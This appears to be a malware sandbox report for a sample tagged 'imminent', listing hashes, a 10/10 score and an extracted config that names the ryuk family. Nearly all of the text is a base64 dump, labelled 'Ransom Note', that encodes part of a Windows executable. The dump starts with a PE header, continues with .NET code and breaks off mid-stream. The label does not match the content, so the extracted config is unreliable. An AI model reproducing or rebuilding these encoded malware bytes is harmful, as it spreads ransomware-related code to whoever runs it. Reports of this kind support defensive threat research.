imminent | e31c8cd9a69d71d4e988de583fc77fe970d7491a89df07611a46235afa8dbe68

General

Target

e31c8cd9a69d71d4e988de583fc77fe970d7491a89df07611a46235afa8dbe68
Size

9.5MB
Sample

220122-ah9p4sedb8
MD5

a91173d3707d48a5c51240b9aa710f05
SHA1

1d99b42d879fa8652904f87a1fa9e4a2526e2be5
SHA256

e31c8cd9a69d71d4e988de583fc77fe970d7491a89df07611a46235afa8dbe68
SHA512

6ed3bdef2ef3403f5cc0fabdafd1e514c15d6f12055833545b34c12e11f3cf3eb9a339b314c03d237e56f0e1775b332464daa28d010f8193d82a3a18a0173de1

Score

10^/10

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\WdiService\млѬПОёфяЛныи.txt

Family

ryuk

Ransom Note

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAMbIZVkAAAAAAAAAAOAAAgELAQgAAPCUAACAAgAAAAAA7gqVAAAgAAAAIJUAAABAAAAgAAAAEAAABAAAAAAAAAAEAAAAAAAAAADAlwAAEAAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAJwKlQBPAAAAACCVACZiAgAAAAAAAAAAAAAAAAAAAAAAAKCXAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA9OqUAAAgAAAA8JQAABAAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACZiAgAAIJUAAHACAAAAlQAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKCXAAAQAAAAcJcAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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/xEEFHJOAQBwFo0BAAABFBQUKAQAAAooCgAAChMHEQQUck4BAHAXjQEAAAETDRENFhEEFHJiAQBwFo0BAAABFBQUKAQAAAooCwAACqIRDRQUKAwAAAreJREEFHJOAQBwF40BAAABEw0RDRYRB4wRAAABohENFBQoDAAACtwRBBRyKgEAcBmNAQAAARMNEQ0WFowOAAABohENFxeMDgAAAaIRDRgRCaIRDRMPEQ8UFBmNDgAAARMQERAWFpwREBcWnBEQGBecERAXKAYAAAomERAYkCwfEQ8YmigLAAAK0BIAAAEoDwAACigQAAAKdBIAAAETCd4B3CsqAhRykAEAcBiNAQAAGxMREREWFKIRERcWjQEAAAGiEREUFBQXKAYAAAomKkFIAAACAAAAVwEAAJAAAADnAQAAJQAAAAAAAAECAAAAYQMAAFcAAAC4AwAAJQAAAAAAAAECAAAAqwAAAKsDAABWBAAAAQAAAAAAAAEbMAwA0wQAAAMAABEbCh0LBgc+UQQAAB8tDRkTChYTBHIBAABwco4AAHAYHxAgAAEAACgCAAAKEwYRBhkzDHKwAABwKAMAAAorGxEGGjMMcswAAHAoAwAACisKcugAAHAoAwAAChEMOfoDAAARDBRyBgEAcBaNAQAAARQUFCgEAAAKKAUAAAo52gMAABEMFHIUAQBwFo0BAAABFBQUKAQAAAoUch4BAHAWjQEAAAEUFBQXKAYAAAomEQgXLwMXEwgRCygHAAAKEQgxCxELEQgoCAAAChMLEQU5hgMAABEFFHIqAQBwGY0BAAABExERERYXjA4AAAGiEREXF4wOAAABohERGHI+AQBwohERFBQUFygGAAAKJhENExIREnJCAQBwFigJAAAKFjMFON8BAAAREnJGAQBwFigJAAAKFjMFOMoBAAAREnJKAQBwFigJAAAKFkASAQAAEQsoBwAAChY+AAEAABEFFHJOAQBwFo0BAAABFBQUKAQAAAooCgAAChMJEQUUck4BAHAXjQEAAAETERERFhEFFHJiAQBwFo0BAAABFBQUKAQAAAooCwAACqIRERQUKAwAAAoRBRRyKgEAcBmNAQAAARMREREWFowOAAABohERFxeMDgAAAaIRERhyPgEAcKIRERQUFBcoBgAACibeJREFFHJOAQBwF40BAAABExERERYRCYwRAAABohERFBQoDAAACtwRCxELKAcAAAoXWSgIAAAKEwsRBRRyKgEAcBmNAQAAARMREREWFowOAAABohERFxeMDgAAAaIRERhyPgEAcKIRERQUFBcoBgAACiY4pQAAABEScnYBAHAWKAkAAAoWLhAREnJ6AQBwFigJAAAKFjMCKxAREnJ+AQBwFigJAAAKFjMCKxAREnKEAQBwFigJAAAKFjMFFxMEK1wRDSgHAAAKF/4BEQsoBwAAChEI/gRfLEQRCxENKA0AAAoTCxEFFHIqAQBwGY0BAAABExERERYWjA4AAAGiEREXF4wOAAABohERGHI+AQBwohERFBQUFygGAAAKJh8rEQdZIPoAAAAxOREFFHIqAQBwGY0BAAABExERERYWjA4AAAGiEREXF4wOAAABohERGHI+AQBwohERFBQUFygGAAAKJhENcooBAHAWKAkAAAoWMwYXKA4AAAoRBDmm/f//EQUUck4BAHAWjQEAAAEUFBQoBAAACigKAAAKEwkRBRRyTgEAcBeNAQAAARMREREWEQUUcmIBAHAWjQEAAAEUFBQoBAAACigLAAAKohERFBQoDAAACt4lEQUUck4BAHAXjQEAAAETERERFhEJjBEAAAGiEREUFCgMAAAK3BEFFHIqAQBwGY0BAAABExERERYWjA4AAAGiEREXF4wOAAABohERGBELohERExMRExQUGY0OAAABExQRFBYWnBEUFxacERQYF5wRFBcoBgAACiYRFBiQLB8RExiaKAsAAArQEgAAASgPAAAKKBAAAAp0EgAAARML3gHcK3UoEwAACnKeAQBwbxQAAAoTDygGAAAGdAIAABsTDhEOjrcYWhEPjrdYExArPxEOERARDo63XREOERARDo63XZERDxEQEQ+Ot12RYREOERAXWBEOjrddkVkgAAEAAFggAAEAAF3SnBEQFVgTEBEQFi+8EQ4MKwAIKgBBSAAAAgAAAFgBAACQAAAA6AEAACUAAAAAAAABAgAAAGQDAABXAAAAuwMAACUAAAAAAAABAgAAAKwAAACtAwAAWQQAAAEAAAAAAAABGzAMAGkEAAAEAAARGwodCwYHPlEEAAAfLQ0ZEwoWEwRyAQAAcHKOAABwGB8QIAABAAAoAgAAChMGEQYZMwxysAAAcCgDAAAKKxsRBhozDHLMAABwKAMAAAorCnLoAABwKAMAAAoRDDn6AwAA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BitcEQ8oBwAAChf+ARENKAcAAAoRCv4EXyxEEQ0RDygNAAAKEw0RBxRyKgEAcBmNAQAAARMQERAWFowOAAABohEQFxeMDgAAAaIREBhyPgEAcKIREBQUFBcoBgAACiYfKxEJWSD6AAAAMTkRBxRyKgEAcBmNAQAAARMQERAWFowOAAABohEQFxeMDgAAAaIREBhyPgEAcKIREBQUFBcoBgAACiYRD3KKAQBwFigJAAAKFjMGFygOAAAKEQY5pv3//xEHFHJOAQBwFo0BAAABFBQUKAQAAAooCgAAChMLEQcUck4BAHAXjQEAAAETEBEQFhEHFHJiAQBwFo0BAAABFBQUKAQAAAooCwAACqIREBQUKAwAAAreJREHFHJOAQBwF40BAAABExAREBYRC4wRAAABohEQFBQoDAAACtwRBxRyKgEAcBmNAQAAARMQERAWFowOAAABohEQFxeMDgAAAaIREBgRDaIREBMSERIUFBmNDgAAARMTERMWFpwRExcWnBETGBecERMXKAYAAAomERMYkCwfERIYmigLAAAK0BIAAAEoDwAACigQAAAKdBIAAAETDd4B3CsQ0AMAAAIoDwAACm8RAAAKCgYoCwAACigCAAAGFHL6AQBwF40BAAABExIREhZyDgIAcKIREhQUFCgEAAAKKAsAAAoNCRMEKwARBCoAQUgAAAIAAABZAQAAkAAAAOkBAAAlAAAAAAAAAQIAAABlAwAAVwAAALwDAAAlAAAAAAAAAQIAAACtAAAArQMAAFoEAAABAAAAAAAAARswDAB5BAAABgAAERsKHQ0GCT4mBAAAHy0TBBkTChYTBREMORMEAAARDBRyBgEAcBaNAQAAARQUFCgEAAAKKAUAAAo58wMAAHIBAABwco4AAHAYHxAgAAEAACgCAAAKEw0RDRkzDHKwAABwKAMAAAorGxENGjMMcswAAHAoAwAACisKcugAAHAoAwAAChEIFy8DFxMIEQsoBwAAChEIMQsRCxEIKAgAAAoTCxEGOYYDAAARBhRyKgEAcBmNAQAAARMPEQ8WF4wOAAABohEPFxeMDgAAAaIRDxhyPgEAcKIRDxQUFBcoBgAACiYRDhMQERByQgEAcBYoCQAAChYzBTjfAQAAERByRgEAcBYoCQAAChYzBTjKAQAAERBySgEAcBYoCQAAChZAEgEAABELKAcAAAoWPgABAAARBhRyTgEAcBaNAQAAARQUFCgEAAAKKAoAAAoTCREGFHJOAQBwF40BAAABEw8RDxYRBhRyYgEAcBaNAQAAARQUFCgEAAAKKAsAAAqiEQ8UFCgMAAAKEQYUcioBAHAZjQEAAAETDxEPFhaMDgAAAaIRDxcXjA4AAAGiEQ8Ycj4BAHCiEQ8UFBQXKAYAAAom3iURBhRyTgEAcBeNAQAAARMPEQ8WEQmMEQAAAaIRDxQUKAwAAArcEQsRCygHAAAKF1koCAAAChMLEQYUcioBAHAZjQEAAAETDxEPFhaMDgAAAaIRDxcXjA4AAAGiEQ8Ycj4BAHCiEQ8UFBQXKAYAAAomOKUAAAAREHJ2AQBwFigJAAAKFi4QERByegEAcBYoCQAAChYzAisQERByfgEAcBYoCQAAChYzAisQERByhAEAcBYoCQAAChYzBRcTBStcEQ4oBwAAChf+ARELKAcAAAoRCP4EXyxEEQsRDigNAAAKEwsRBhRyKgEAcBmNAQAAARMPEQ8WFowOAAABohEPFxeMDgAAAaIRDxhyPgEAcKIRDxQUFBcoBgAACiYfKxEHWSD6AAAAMTkRBhRyKgEAcBmNAQAAARMPEQ8WFowOAAABohEPFxeMDgAAAaIRDxhyPgEAcKIRDxQUFBcoBgAACiYRDnKKAQBwFigJAAAKFjMGFygOAAAKEQU5pv3//xEGFHJOAQBwFo0BAAABFBQUKAQAAAooCgAAChMJEQYUck4BAHAXjQEAAAETDxEPFhEGFHJiAQBwFo0BAAABFBQUKAQAAAooCwAACqIRDxQUKAwAAAreJREGFHJOAQBwF40BAAABEw8RDxYRCYwRAAABohEPFBQoDAAACtwRBhRyKgEAcBmNAQAAARMPEQ8WFowOAAABohEPFxeMDgAAAaIRDxgRC6IRDxMREREUFBmNDgAAARMSERIWFpwREhcWnBESGBecERIXKAYAAAomERIYkC